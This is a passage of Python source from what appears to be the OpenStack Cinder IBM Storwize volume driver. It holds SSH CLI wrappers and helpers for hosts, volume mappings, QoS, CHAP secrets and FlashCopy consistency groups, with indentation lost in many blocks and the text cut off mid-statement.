        ssh_cmd = (['svctask', 'addvdiskcopy'] + params + ['-mdiskgrp',
                   '"%s"' % dest_pool, vdisk])
        return self.run_ssh_check_created(ssh_cmd)
    def lsvdiskcopy(self, vdisk, copy_id=None):
        # Querying a single copy returns a headerless detail record.
        ssh_cmd = ['svcinfo', 'lsvdiskcopy', '-delim', '!']
        with_header = True
        if copy_id:
            ssh_cmd += ['-copy', copy_id]
            with_header = False
        ssh_cmd += [vdisk]
        return self.run_ssh_info(ssh_cmd, with_header=with_header)
    def lsvdisksyncprogress(self, vdisk, copy_id):
        ssh_cmd = ['svcinfo', 'lsvdisksyncprogress', '-delim', '!',
                   '-copy', copy_id, vdisk]
        return self.run_ssh_info(ssh_cmd, with_header=True)[0]
    def rmvdiskcopy(self, vdisk, copy_id):
        ssh_cmd = ['svctask', 'rmvdiskcopy', '-copy', copy_id, vdisk]
        self.run_ssh_assert_no_output(ssh_cmd)
    def addvdiskaccess(self, vdisk, iogrp):
        ssh_cmd = ['svctask', 'addvdiskaccess', '-iogrp', iogrp, vdisk]
        self.run_ssh_assert_no_output(ssh_cmd)
    def rmvdiskaccess(self, vdisk, iogrp):
        ssh_cmd = ['svctask', 'rmvdiskaccess', '-iogrp', iogrp, vdisk]
        self.run_ssh_assert_no_output(ssh_cmd)
    def lsportfc(self, node_id):
        ssh_cmd = ['svcinfo', 'lsportfc', '-delim', '!',
                   '-filtervalue', 'node_id=%s' % node_id]
        return self.run_ssh_info(ssh_cmd, with_header=True)
class StorwizeHelpers(object):
    # All the supported QoS keys are saved in this dict. When a new
    # key is added, three values MUST be set:
    # 'default': the value used when the parameter is disabled.
    # 'param': the corresponding parameter in the CLI command.
    # 'type': the type of this value.
    svc_qos_keys = {'IOThrottling': {'default': '0',
                                     'param': 'rate',
                                     'type': int}}
    def __init__(self, run_ssh):
        # run_ssh: callable executing an SSH command list, wrapped in the
        # StorwizeSSH CLI helper.
        self.ssh = StorwizeSSH(run_ssh)
        # Seconds between polls when waiting on FlashCopy mapping state.
        self.check_fcmapping_interval = 3
@staticmethod
def handle_keyerror(cmd, out):
msg = (_('Could not find key in output of command %(cmd)s: %(out)s.')
% {'out': out, 'cmd': cmd})
raise exception.VolumeBackendAPIException(data=msg)
def compression_enabled(self):
"""Return whether or not compression is enabled for this system."""
resp = self.ssh.lslicense()
keys = ['license_compression_enclosures',
'license_compression_capacity']
for key in keys:
if resp.get(key, '0') != '0':
return True
# lslicense is not used for V9000 compression check
# compression_enclosures and compression_capacity are
# always 0. V9000 uses license_scheme 9846 as an
# indicator and can always do compression
try:
resp = self.ssh.lsguicapabilities()
if resp.get('license_scheme', '0') == '9846':
return True
except exception.VolumeBackendAPIException as war:
LOG.warning(_LW("Failed to run lsguicapability. "
"Exception: %s."), war)
return False
def get_system_info(self):
"""Return system's name, ID, and code level."""
resp = self.ssh.lssystem()
level = resp['code_level']
match_obj = re.search('([0-9].){3}[0-9]', level)
if match_obj is None:
msg = _('Failed to get code level (%s).') % level
raise exception.VolumeBackendAPIException(data=msg)
code_level = match_obj.group().split('.')
return {'code_level': tuple([int(x) for x in code_level]),
'system_name': resp['name'],
'system_id': resp['id']}
def get_pool_attrs(self, pool):
"""Return attributes for the specified pool."""
return self.ssh.lsmdiskgrp(pool)
def get_available_io_groups(self):
"""Return list of available IO groups."""
iogrps = []
resp = self.ssh.lsiogrp()
for iogrp in resp:
try:
if int(iogrp['node_count']) > 0:
iogrps.append(int(iogrp['id']))
except KeyError:
self.handle_keyerror('lsiogrp', iogrp)
except ValueError:
msg = (_('Expected integer for node_count, '
'svcinfo lsiogrp returned: %(node)s.') %
{'node': iogrp['node_count']})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return iogrps
def get_volume_io_group(self, vol_name):
vdisk = self.ssh.lsvdisk(vol_name)
if vdisk:
resp = self.ssh.lsiogrp()
for iogrp in resp:
if iogrp['name'] == vdisk['IO_group_name']:
return int(iogrp['id'])
return None
def get_node_info(self):
"""Return dictionary containing information on system's nodes."""
nodes = {}
resp = self.ssh.lsnode()
for node_data in resp:
try:
if node_data['status'] != 'online':
continue
node = {}
node['id'] = node_data['id']
node['name'] = node_data['name']
node['IO_group'] = node_data['IO_group_id']
node['iscsi_name'] = node_data['iscsi_name']
node['WWNN'] = node_data['WWNN']
node['status'] = node_data['status']
node['WWPN'] = []
node['ipv4'] = []
node['ipv6'] = []
node['enabled_protocols'] = []
nodes[node['id']] = node
except KeyError:
self.handle_keyerror('lsnode', node_data)
return nodes
def add_iscsi_ip_addrs(self, storage_nodes):
"""Add iSCSI IP addresses to system node information."""
resp = self.ssh.lsportip()
for ip_data in resp:
try:
state = ip_data['state']
if ip_data['node_id'] in storage_nodes and (
state == 'configured' or state == 'online'):
node = storage_nodes[ip_data['node_id']]
if len(ip_data['IP_address']):
node['ipv4'].append(ip_data['IP_address'])
if len(ip_data['IP_address_6']):
node['ipv6'].append(ip_data['IP_address_6'])
except KeyError:
self.handle_keyerror('lsportip', ip_data)
def add_fc_wwpns(self, storage_nodes):
"""Add FC WWPNs to system node information."""
for key in storage_nodes:
node = storage_nodes[key]
wwpns = set(node['WWPN'])
resp = self.ssh.lsportfc(node_id=node['id'])
for port_info in resp:
if (port_info['type'] == 'fc' and
port_info['status'] == 'active'):
wwpns.add(port_info['WWPN'])
node['WWPN'] = list(wwpns)
LOG.info(_LI('WWPN on node %(node)s: %(wwpn)s.'),
{'node': node['id'], 'wwpn': node['WWPN']})
def add_chap_secret_to_host(self, host_name):
"""Generate and store a randomly-generated CHAP secret for the host."""
chap_secret = utils.generate_password()
self.ssh.add_chap_secret(chap_secret, host_name)
return chap_secret
def get_chap_secret_for_host(self, host_name):
"""Generate and store a randomly-generated CHAP secret for the host."""
resp = self.ssh.lsiscsiauth()
host_found = False
for host_data in resp:
try:
if host_data['name'] == host_name:
host_found = True
if host_data['iscsi_auth_method'] == 'chap':
return host_data['iscsi_chap_secret']
except KeyError:
self.handle_keyerror('lsiscsiauth', host_data)
if not host_found:
msg = _('Failed to find host %s.') % host_name
raise exception.VolumeBackendAPIException(data=msg)
return None
def get_conn_fc_wwpns(self, host):
wwpns = set()
resp = self.ssh.lsfabric(host=host)
for wwpn in resp.select('local_wwpn'):
if wwpn is not None:
wwpns.add(wwpn)
return list(wwpns)
    def get_host_from_connector(self, connector):
        """Return the Storwize host described by the connector.

        First tries a fast per-WWPN lsfabric lookup when FC information
        is present, then falls back to an exhaustive scan of all hosts,
        matching either the iSCSI initiator name or any WWPN.
        Returns None when no host matches.
        """
        LOG.debug('Enter: get_host_from_connector: %s.', connector)
        # If we have FC information, we have a faster lookup option
        host_name = None
        if 'wwpns' in connector:
            for wwpn in connector['wwpns']:
                resp = self.ssh.lsfabric(wwpn=wwpn)
                for wwpn_info in resp:
                    try:
                        # Case-insensitive WWPN comparison.
                        if (wwpn_info['remote_wwpn'] and
                                wwpn_info['name'] and
                                wwpn_info['remote_wwpn'].lower() ==
                                wwpn.lower()):
                            host_name = wwpn_info['name']
                    except KeyError:
                        self.handle_keyerror('lsfabric', wwpn_info)
        if host_name:
            LOG.debug('Leave: get_host_from_connector: host %s.', host_name)
            return host_name
        # That didn't work, so try exhaustive search
        hosts_info = self.ssh.lshost()
        found = False
        for name in hosts_info.select('name'):
            # One detail query per host to inspect its ports.
            resp = self.ssh.lshost(host=name)
            if 'initiator' in connector:
                for iscsi in resp.select('iscsi_name'):
                    if iscsi == connector['initiator']:
                        host_name = name
                        found = True
                        break
            elif 'wwpns' in connector and len(connector['wwpns']):
                connector_wwpns = [str(x).lower() for x in connector['wwpns']]
                for wwpn in resp.select('WWPN'):
                    if wwpn and wwpn.lower() in connector_wwpns:
                        host_name = name
                        found = True
                        break
            if found:
                break
        LOG.debug('Leave: get_host_from_connector: host %s.', host_name)
        return host_name
    def create_host(self, connector):
        """Create a new host on the storage system.

        We create a host name and associate it with the given connection
        information. The host name will be a cleaned up version of the given
        host name (at most 55 characters), plus a random 8-character suffix to
        avoid collisions. The total length should be at most 63 characters.

        :param connector: connection info dict; must contain 'host' and at
            least one of 'initiator' (iSCSI) or 'wwpns' (FC).
        :returns: the name of the host created on the backend.
        :raises exception.VolumeDriverException: if the host name is not a
            string or no ports were supplied.
        """
        LOG.debug('Enter: create_host: host %s.', connector['host'])
        # Before we start, make sure host name is a string and that we have at
        # least one port.
        host_name = connector['host']
        if not isinstance(host_name, six.string_types):
            msg = _('create_host: Host name is not unicode or string.')
            LOG.error(msg)
            raise exception.VolumeDriverException(message=msg)
        # Collect all ports as (type, value) pairs; the first is used for
        # mkhost, the rest are added with addhostport.
        ports = []
        if 'initiator' in connector:
            ports.append(['initiator', '%s' % connector['initiator']])
        if 'wwpns' in connector:
            for wwpn in connector['wwpns']:
                ports.append(['wwpn', '%s' % wwpn])
        if not len(ports):
            msg = _('create_host: No initiators or wwpns supplied.')
            LOG.error(msg)
            raise exception.VolumeDriverException(message=msg)
        # Build a host name for the Storwize host - first clean up the name
        if isinstance(host_name, six.text_type):
            # Strip accents/non-ASCII, then replace every character the
            # backend does not accept with '-'.
            host_name = unicodedata.normalize('NFKD', host_name).encode(
                'ascii', 'replace').decode('ascii')
        for num in range(0, 128):
            ch = str(chr(num))
            if not ch.isalnum() and ch not in [' ', '.', '-', '_']:
                host_name = host_name.replace(ch, '-')
        # Storwize doesn't like hostname that doesn't starts with letter or _.
        if not re.match('^[A-Za-z]', host_name):
            host_name = '_' + host_name
        # Add a random 8-character suffix to avoid collisions
        rand_id = str(random.randint(0, 99999999)).zfill(8)
        host_name = '%s-%s' % (host_name[:55], rand_id)
        # Create a host with one port
        port = ports.pop(0)
        self.ssh.mkhost(host_name, port[0], port[1])
        # Add any additional ports to the host
        for port in ports:
            self.ssh.addhostport(host_name, port[0], port[1])
        LOG.debug('Leave: create_host: host %(host)s - %(host_name)s.',
                  {'host': connector['host'], 'host_name': host_name})
        return host_name
def delete_host(self, host_name):
self.ssh.rmhost(host_name)
def map_vol_to_host(self, volume_name, host_name, multihostmap):
"""Create a mapping between a volume to a host."""
LOG.debug('Enter: map_vol_to_host: volume %(volume_name)s to '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
# Check if this volume is already mapped to this host
mapped = False
luns_used = []
result_lun = '-1'
resp = self.ssh.lshostvdiskmap(host_name)
for mapping_info in resp:
luns_used.append(int(mapping_info['SCSI_id']))
if mapping_info['vdisk_name'] == volume_name:
mapped = True
result_lun = mapping_info['SCSI_id']
if not mapped:
# Find unused lun
luns_used.sort()
result_lun = str(len(luns_used))
for index, n in enumerate(luns_used):
if n > index:
result_lun = str(index)
break
self.ssh.mkvdiskhostmap(host_name, volume_name, result_lun,
multihostmap)
LOG.debug('Leave: map_vol_to_host: LUN %(result_lun)s, volume '
'%(volume_name)s, host %(host_name)s.',
{'result_lun': result_lun,
'volume_name': volume_name,
'host_name': host_name})
return int(result_lun)
def unmap_vol_from_host(self, volume_name, host_name):
"""Unmap the volume and delete the host if it has no more mappings."""
LOG.debug('Enter: unmap_vol_from_host: volume %(volume_name)s from '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
# Check if the mapping exists
resp = self.ssh.lsvdiskhostmap(volume_name)
if not len(resp):
LOG.warning(_LW('unmap_vol_from_host: No mapping of volume '
'%(vol_name)s to any host found.'),
{'vol_name': volume_name})
return
if host_name is None:
if len(resp) > 1:
LOG.warning(_LW('unmap_vol_from_host: Multiple mappings of '
'volume %(vol_name)s found, no host '
'specified.'), {'vol_name': volume_name})
return
else:
host_name = resp[0]['host_name']
else:
found = False
for h in resp.select('host_name'):
if h == host_name:
found = True
if not found:
LOG.warning(_LW('unmap_vol_from_host: No mapping of volume '
'%(vol_name)s to host %(host)s found.'),
{'vol_name': volume_name, 'host': host_name})
# We now know that the mapping exists
self.ssh.rmvdiskhostmap(host_name, volume_name)
LOG.debug('Leave: unmap_vol_from_host: volume %(volume_name)s from '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
return host_name
def check_host_mapped_vols(self, host_name):
return self.ssh.lshostvdiskmap(host_name)
@staticmethod
def build_default_opts(config):
# Ignore capitalization
cluster_partner = config.storwize_svc_stretched_cluster_partner
opt = {'rsize': config.storwize_svc_vol_rsize,
'warning': config.storwize_svc_vol_warning,
'autoexpand': config.storwize_svc_vol_autoexpand,
'grainsize': config.storwize_svc_vol_grainsize,
'compression': config.storwize_svc_vol_compression,
'easytier': config.storwize_svc_vol_easytier,
'iogrp': config.storwize_svc_vol_iogrp,
'qos': None,
'stretched_cluster': cluster_partner,
'replication': False,
'nofmtdisk': config.storwize_svc_vol_nofmtdisk}
return opt
@staticmethod
def check_vdisk_opts(state, opts):
# Check that grainsize is 32/64/128/256
if opts['grainsize'] not in [32, 64, 128, 256]:
raise exception.InvalidInput(
reason=_('Illegal value specified for '
'storwize_svc_vol_grainsize: set to either '
'32, 64, 128, or 256.'))
# Check that compression is supported
if opts['compression'] and not state['compression_enabled']:
raise exception.InvalidInput(
reason=_('System does not support compression.'))
# Check that rsize is set if compression is set
if opts['compression'] and opts['rsize'] == -1:
raise exception.InvalidInput(
reason=_('If compression is set to True, rsize must '
'also be set (not equal to -1).'))
if opts['iogrp'] not in state['available_iogrps']:
avail_grps = ''.join(str(e) for e in state['available_iogrps'])
raise exception.InvalidInput(
reason=_('I/O group %(iogrp)d is not valid; available '
'I/O groups are %(avail)s.')
% {'iogrp': opts['iogrp'],
'avail': avail_grps})
if opts['nofmtdisk'] and opts['rsize'] != -1:
raise exception.InvalidInput(
reason=_('If nofmtdisk is set to True, rsize must '
'also be set to -1.'))
def _get_opts_from_specs(self, opts, specs):
qos = {}
for k, value in specs.items():
# Get the scope, if using scope format
key_split = k.split(':')
if len(key_split) == 1:
scope = None
key = key_split[0]
else:
scope = key_split[0]
key = key_split[1]
# We generally do not look at capabilities in the driver, but
# replication is a special case where the user asks for
# a volume to be replicated, and we want both the scheduler and
# the driver to act on the value.
if ((not scope or scope == 'capabilities') and
key == 'replication'):
scope = None
key = 'replication'
words = value.split()
if not (words and len(words) == 2 and words[0] == '<is>'):
LOG.error(_LE('Replication must be specified as '
'\'<is> True\' or \'<is> False\'.'))
del words[0]
value = words[0]
# Add the QoS.
if scope and scope == 'qos':
if key in self.svc_qos_keys.keys():
try:
type_fn = self.svc_qos_keys[key]['type']
value = type_fn(value)
qos[key] = value
except ValueError:
continue
# Any keys that the driver should look at should have the
# 'drivers' scope.
if scope and scope != 'drivers':
continue
if key in opts:
this_type = type(opts[key]).__name__
if this_type == 'int':
value = int(value)
elif this_type == 'bool':
value = strutils.bool_from_string(value)
opts[key] = value
if len(qos) != 0:
opts['qos'] = qos
return opts
def _get_qos_from_volume_metadata(self, volume_metadata):
"""Return the QoS information from the volume metadata."""
qos = {}
for i in volume_metadata:
k = i.get('key', None)
value = i.get('value', None)
key_split = k.split(':')
if len(key_split) == 1:
scope = None
key = key_split[0]
else:
scope = key_split[0]
key = key_split[1]
# Add the QoS.
if scope and scope == 'qos':
if key in self.svc_qos_keys.keys():
try:
type_fn = self.svc_qos_keys[key]['type']
value = type_fn(value)
qos[key] = value
except ValueError:
continue
return qos
def _wait_for_a_condition(self, testmethod, timeout=None,
interval=INTERVAL_1_SEC):
start_time = time.time()
if timeout is None:
timeout = DEFAULT_TIMEOUT
def _inner():
try:
testValue = testmethod()
except Exception as ex:
testValue = False
LOG.debug('Helper.'
'_wait_for_condition: %(method_name)s '
'execution failed for %(exception)s.',
{'method_name': testmethod.__name__,
'exception': ex.message})
if testValue:
raise loopingcall.LoopingCallDone()
if int(time.time()) - start_time > timeout:
msg = (_('CommandLineHelper._wait_for_condition: %s timeout.')
% testmethod.__name__)
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
timer = loopingcall.FixedIntervalLoopingCall(_inner)
timer.start(interval=interval).wait()
    def get_vdisk_params(self, config, state, type_id,
                         volume_type=None, volume_metadata=None):
        """Return the parameters for creating the vdisk.

        Takes volume type and defaults from config options into account.

        :param config: driver configuration object.
        :param state: backend state dict (validated against at the end).
        :param type_id: volume type id, looked up when volume_type is None.
        :param volume_type: optional pre-fetched volume type dict.
        :param volume_metadata: optional metadata list used for
                                tenant-supplied QoS.
        :returns: validated option dict (see build_default_opts).
        """
        opts = self.build_default_opts(config)
        ctxt = context.get_admin_context()
        if volume_type is None and type_id is not None:
            volume_type = volume_types.get_volume_type(ctxt, type_id)
        if volume_type:
            qos_specs_id = volume_type.get('qos_specs_id')
            specs = dict(volume_type).get('extra_specs')
            # NOTE(vhou): We prefer the qos_specs association
            # and over-ride any existing
            # extra-specs settings if present
            if qos_specs_id is not None:
                kvs = qos_specs.get_qos_specs(ctxt, qos_specs_id)['specs']
                # Merge the qos_specs into extra_specs and qos_specs has higher
                # priority than extra_specs if they have different values for
                # the same key.
                specs.update(kvs)
            opts = self._get_opts_from_specs(opts, specs)
        # Tenant QoS from volume metadata is only honored when no
        # type-level QoS was found and the config flag allows it.
        if (opts['qos'] is None and config.storwize_svc_allow_tenant_qos
                and volume_metadata):
            qos = self._get_qos_from_volume_metadata(volume_metadata)
            if len(qos) != 0:
                opts['qos'] = qos
        self.check_vdisk_opts(state, opts)
        return opts
@staticmethod
def _get_vdisk_create_params(opts):
easytier = 'on' if opts['easytier'] else 'off'
if opts['rsize'] == -1:
params = []
if opts['nofmtdisk']:
params.append('-nofmtdisk')
else:
params = ['-rsize', '%s%%' % str(opts['rsize']),
'-autoexpand', '-warning',
'%s%%' % str(opts['warning'])]
if not opts['autoexpand']:
params.remove('-autoexpand')
if opts['compression']:
params.append('-compressed')
else:
params.extend(['-grainsize', str(opts['grainsize'])])
params.extend(['-easytier', easytier])
return params
    def create_vdisk(self, name, size, units, pool, opts):
        """Create a vdisk via mkvdisk.

        :param size: capacity value, in the given units.
        :param units: capacity unit string passed to the CLI (e.g. 'b').
        :param opts: option dict (see build_default_opts).
        """
        LOG.debug('Enter: create_vdisk: vdisk %s.', name)
        params = self._get_vdisk_create_params(opts)
        self.ssh.mkvdisk(name, size, units, pool, opts, params)
        LOG.debug('Leave: _create_vdisk: volume %s.', name)
    def get_vdisk_attributes(self, vdisk):
        # May be None when the vdisk does not exist (see is_vdisk_defined).
        attrs = self.ssh.lsvdisk(vdisk)
        return attrs
    def is_vdisk_defined(self, vdisk_name):
        """Check if vdisk is defined."""
        attrs = self.get_vdisk_attributes(vdisk_name)
        return attrs is not None
    def find_vdisk_copy_id(self, vdisk, pool):
        """Return the id of the vdisk copy residing in the given pool.

        :raises exception.VolumeDriverException: when no copy of the
            vdisk lives in pool.
        """
        resp = self.ssh.lsvdiskcopy(vdisk)
        for copy_id, mdisk_grp in resp.select('copy_id', 'mdisk_grp_name'):
            if mdisk_grp == pool:
                return copy_id
        msg = _('Failed to find a vdisk copy in the expected pool.')
        LOG.error(msg)
        raise exception.VolumeDriverException(message=msg)
    def get_vdisk_copy_attrs(self, vdisk, copy_id):
        # lsvdiskcopy with an explicit copy_id yields a single row.
        return self.ssh.lsvdiskcopy(vdisk, copy_id=copy_id)[0]
def get_vdisk_copies(self, vdisk):
copies = {'primary': None,
'secondary': None}
resp = self.ssh.lsvdiskcopy(vdisk)
for copy_id, status, sync, primary, mdisk_grp in (
resp.select('copy_id', 'status', 'sync',
'primary', 'mdisk_grp_name')):
copy = {'copy_id': copy_id,
'status': status,
'sync': sync,
'primary': primary,
'mdisk_grp_name': mdisk_grp,
'sync_progress': None}
if copy['sync'] != 'yes':
progress_info = self.ssh.lsvdisksyncprogress(vdisk, copy_id)
copy['sync_progress'] = progress_info['progress']
if copy['primary'] == 'yes':
copies['primary'] = copy
else:
copies['secondary'] = copy
return copies
def _prepare_fc_map(self, fc_map_id, timeout):
self.ssh.prestartfcmap(fc_map_id)
mapping_ready = False
wait_time = 5
max_retries = (timeout // wait_time) + 1
for try_number in range(1, max_retries):
mapping_attrs = self._get_flashcopy_mapping_attributes(fc_map_id)
if (mapping_attrs is None or
'status' not in mapping_attrs):
break
if mapping_attrs['status'] == 'prepared':
mapping_ready = True
break
elif mapping_attrs['status'] == 'stopped':
self.ssh.prestartfcmap(fc_map_id)
elif mapping_attrs['status'] != 'preparing':
msg = (_('Unexecpted mapping status %(status)s for mapping '
'%(id)s. Attributes: %(attr)s.')
% {'status': mapping_attrs['status'],
'id': fc_map_id,
'attr': mapping_attrs})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
greenthread.sleep(wait_time)
if not mapping_ready:
msg = (_('Mapping %(id)s prepare failed to complete within the'
'allotted %(to)d seconds timeout. Terminating.')
% {'id': fc_map_id,
'to': timeout})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
    def start_fc_consistgrp(self, fc_consistgrp):
        # Start all FlashCopy mappings in the consistency group.
        self.ssh.startfcconsistgrp(fc_consistgrp)
    def create_fc_consistgrp(self, fc_consistgrp):
        # Create an empty FlashCopy consistency group.
        self.ssh.mkfcconsistgrp(fc_consistgrp)
    def delete_fc_consistgrp(self, fc_consistgrp):
        # Remove the FlashCopy consistency group object.
        self.ssh.rmfcconsistgrp(fc_consistgrp)
    def stop_fc_consistgrp(self, fc_consistgrp):
        # Stop the FlashCopy consistency group.
        self.ssh.stopfcconsistgrp(fc_consistgrp)
    def run_consistgrp_snapshots(self, fc_consistgrp, snapshots, state,
                                 config, timeout):
        """Snapshot a set of volumes consistently via one FlashCopy group.

        Creates one FlashCopy per snapshot inside fc_consistgrp, prepares
        and starts the group, then deletes the group object.

        :returns: (cgsnapshot model dict, snapshots list) with statuses
                  set to 'available' or 'error'.
        """
        cgsnapshot = {'status': 'available'}
        try:
            for snapshot in snapshots:
                opts = self.get_vdisk_params(config, state,
                                             snapshot['volume_type_id'])
                self.create_flashcopy_to_consistgrp(snapshot['volume_name'],
                                                    snapshot['name'],
                                                    fc_consistgrp,
                                                    config, opts)
                snapshot['status'] = 'available'
            self.prepare_fc_consistgrp(fc_consistgrp, timeout)
            self.start_fc_consistgrp(fc_consistgrp)
            # There is CG limitation that could not create more than 128 CGs.
            # After start CG, we delete CG to avoid CG limitation.
            # Cinder general will maintain the CG and snapshots relationship.
            self.delete_fc_consistgrp(fc_consistgrp)
        except exception.VolumeBackendAPIException as err:
            for snapshot in snapshots:
                snapshot['status'] = 'error'
            cgsnapshot['status'] = 'error'
            # Release cg
            self.delete_fc_consistgrp(fc_consistgrp)
            LOG.error(_LE("Failed to create CGSnapshot. "
                          "Exception: %s."), err)
        return cgsnapshot, snapshots
    def delete_consistgrp_snapshots(self, fc_consistgrp, snapshots):
        """Delete flashcopy maps and consistent group.

        Force-removes each snapshot vdisk; on failure, all snapshots are
        marked 'error_deleting'.

        :returns: (cgsnapshot model dict, snapshots list).
        """
        cgsnapshot = {'status': 'available'}
        try:
            for snapshot in snapshots:
                self.ssh.rmvdisk(snapshot['name'], True)
                snapshot['status'] = 'deleted'
        except exception.VolumeBackendAPIException as err:
            for snapshot in snapshots:
                snapshot['status'] = 'error_deleting'
            cgsnapshot['status'] = 'error_deleting'
            # NOTE(review): this log runs after the loop above, so it only
            # names the last snapshot even though all get error_deleting.
            LOG.error(_LE("Failed to delete the snapshot %(snap)s of "
                          "CGSnapshot. Exception: %(exception)s."),
                      {'snap': snapshot['name'], 'exception': err})
        return cgsnapshot, snapshots
def prepare_fc_consistgrp(self, fc_consistgrp, timeout):
"""Prepare FC Consistency Group."""
self.ssh.prestartfcconsistgrp(fc_consistgrp)
def prepare_fc_consistgrp_success():
mapping_ready = False
mapping_attrs = self._get_flashcopy_consistgrp_attr(fc_consistgrp)
if (mapping_attrs is None or
'status' not in mapping_attrs):
pass
if mapping_attrs['status'] == 'prepared':
mapping_ready = True
elif mapping_attrs['status'] == 'stopped':
self.ssh.prestartfcconsistgrp(fc_consistgrp)
elif mapping_attrs['status'] != 'preparing':
msg = (_('Unexpected mapping status %(status)s for mapping'
'%(id)s. Attributes: %(attr)s.') %
{'status': mapping_attrs['status'],
'id': fc_consistgrp,
'attr': mapping_attrs})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return mapping_ready
self._wait_for_a_condition(prepare_fc_consistgrp_success, timeout)
    def create_cg_from_source(self, group, fc_consistgrp,
                              sources, targets, state,
                              config, timeout):
        """Create consistence group from source.

        Clones each source vdisk to its paired target inside one FlashCopy
        consistency group, then prepares/starts the group and deletes the
        group object.

        :returns: (model_update, volumes_model_update) for the new group.
        """
        LOG.debug('Enter: create_cg_from_source: cg %(cg)s'
                  ' source %(source)s, target %(target)s',
                  {'cg': fc_consistgrp, 'source': sources, 'target': targets})
        model_update = {'status': fields.ConsistencyGroupStatus.AVAILABLE}
        ctxt = context.get_admin_context()
        try:
            for source, target in zip(sources, targets):
                opts = self.get_vdisk_params(config, state,
                                             source['volume_type_id'])
                pool = utils.extract_host(target['host'], 'pool')
                self.create_flashcopy_to_consistgrp(source['name'],
                                                    target['name'],
                                                    fc_consistgrp,
                                                    config, opts,
                                                    True, pool=pool)
            self.prepare_fc_consistgrp(fc_consistgrp, timeout)
            self.start_fc_consistgrp(fc_consistgrp)
            self.delete_fc_consistgrp(fc_consistgrp)
            volumes_model_update = self._get_volume_model_updates(
                ctxt, targets, group['id'], model_update['status'])
        except exception.VolumeBackendAPIException as err:
            model_update['status'] = fields.ConsistencyGroupStatus.ERROR
            volumes_model_update = self._get_volume_model_updates(
                ctxt, targets, group['id'], model_update['status'])
            with excutils.save_and_reraise_exception():
                # Release cg
                self.delete_fc_consistgrp(fc_consistgrp)
                LOG.error(_LE("Failed to create CG from CGsnapshot. "
                              "Exception: %s"), err)
            # NOTE(review): save_and_reraise_exception re-raises on exit,
            # so this return is normally unreachable.
            return model_update, volumes_model_update

        LOG.debug('Leave: create_cg_from_source.')
        return model_update, volumes_model_update
def _get_volume_model_updates(self, ctxt, volumes, cgId,
status='available'):
"""Update the volume model's status and return it."""
volume_model_updates = []
LOG.info(_LI(
"Updating status for CG: %(id)s."),
{'id': cgId})
if volumes:
for volume in volumes:
volume_model_updates.append({'id': volume['id'],
'status': status})
else:
LOG.info(_LI("No volume found for CG: %(cg)s."),
{'cg': cgId})
return volume_model_updates
    def run_flashcopy(self, source, target, timeout, copy_rate,
                      full_copy=True):
        """Create a FlashCopy mapping from the source to the target.

        The mapping is created, prepared (blocking up to ``timeout``
        seconds), and then started.
        """
        LOG.debug('Enter: run_flashcopy: execute FlashCopy from source '
                  '%(source)s to target %(target)s.',
                  {'source': source, 'target': target})
        fc_map_id = self.ssh.mkfcmap(source, target, full_copy, copy_rate)
        self._prepare_fc_map(fc_map_id, timeout)
        self.ssh.startfcmap(fc_map_id)
        LOG.debug('Leave: run_flashcopy: FlashCopy started from '
                  '%(source)s to %(target)s.',
                  {'source': source, 'target': target})
    def create_flashcopy_to_consistgrp(self, source, target, consistgrp,
                                       config, opts, full_copy=False,
                                       pool=None):
        """Create a FlashCopy mapping and add to consistent group.

        Creates the target vdisk first (same capacity as the source, in
        ``pool`` or the source's pool), then an un-started mapping bound
        to ``consistgrp``; the group is prepared/started by the caller.

        :raises exception.VolumeDriverException: if the source is absent.
        """
        LOG.debug('Enter: create_flashcopy_to_consistgrp: create FlashCopy'
                  ' from source %(source)s to target %(target)s'
                  'Then add the flashcopy to %(cg)s.',
                  {'source': source, 'target': target, 'cg': consistgrp})
        src_attrs = self.get_vdisk_attributes(source)
        if src_attrs is None:
            msg = (_('create_copy: Source vdisk %(src)s '
                     'does not exist.') % {'src': source})
            LOG.error(msg)
            raise exception.VolumeDriverException(message=msg)
        src_size = src_attrs['capacity']
        # In case we need to use a specific pool
        if not pool:
            pool = src_attrs['mdisk_grp_name']
        self.create_vdisk(target, src_size, 'b', pool, opts)
        self.ssh.mkfcmap(source, target, full_copy,
                         config.storwize_svc_flashcopy_rate,
                         consistgrp=consistgrp)
        LOG.debug('Leave: create_flashcopy_to_consistgrp: '
                  'FlashCopy started from %(source)s to %(target)s.',
                  {'source': source, 'target': target})
def _get_vdisk_fc_mappings(self, vdisk):
"""Return FlashCopy mappings that this vdisk is associated with."""
mapping_ids = []
resp = self.ssh.lsvdiskfcmappings(vdisk)
for id in resp.select('id'):
mapping_ids.append(id)
return mapping_ids
def _get_flashcopy_mapping_attributes(self, fc_map_id):
resp = self.ssh.lsfcmap(fc_map_id)
if not len(resp):
return None
return resp[0]
def _get_flashcopy_consistgrp_attr(self, fc_map_id):
resp = self.ssh.lsfcconsistgrp(fc_map_id)
if not len(resp):
return None
return resp[0]
    def _check_vdisk_fc_mappings(self, name, allow_snaps=True):
        """FlashCopy mapping check helper.

        Invoked repeatedly by a FixedIntervalLoopingCall (see
        ensure_vdisk_no_fc_mappings). Inspects each mapping involving
        vdisk ``name`` and either cleans it up or keeps waiting; raises
        LoopingCallDone(True) once no mappings need waiting on, and
        LoopingCallDone(False) when a snapshot blocks the operation
        while allow_snaps is False.
        """
        LOG.debug('Loopcall: _check_vdisk_fc_mappings(), vdisk %s.', name)
        mapping_ids = self._get_vdisk_fc_mappings(name)
        wait_for_copy = False
        for map_id in mapping_ids:
            attrs = self._get_flashcopy_mapping_attributes(map_id)
            if not attrs:
                continue
            source = attrs['source_vdisk_name']
            target = attrs['target_vdisk_name']
            copy_rate = attrs['copy_rate']
            status = attrs['status']

            if copy_rate == '0':
                if source == name:
                    # Vdisk with snapshots. Return False if snapshot
                    # not allowed.
                    if not allow_snaps:
                        raise loopingcall.LoopingCallDone(retvalue=False)
                    # Raise the copy rate so the map completes and
                    # auto-deletes, then wait for it.
                    self.ssh.chfcmap(map_id, copyrate='50', autodel='on')
                    wait_for_copy = True
                else:
                    # A snapshot
                    if target != name:
                        msg = (_('Vdisk %(name)s not involved in '
                                 'mapping %(src)s -> %(tgt)s.') %
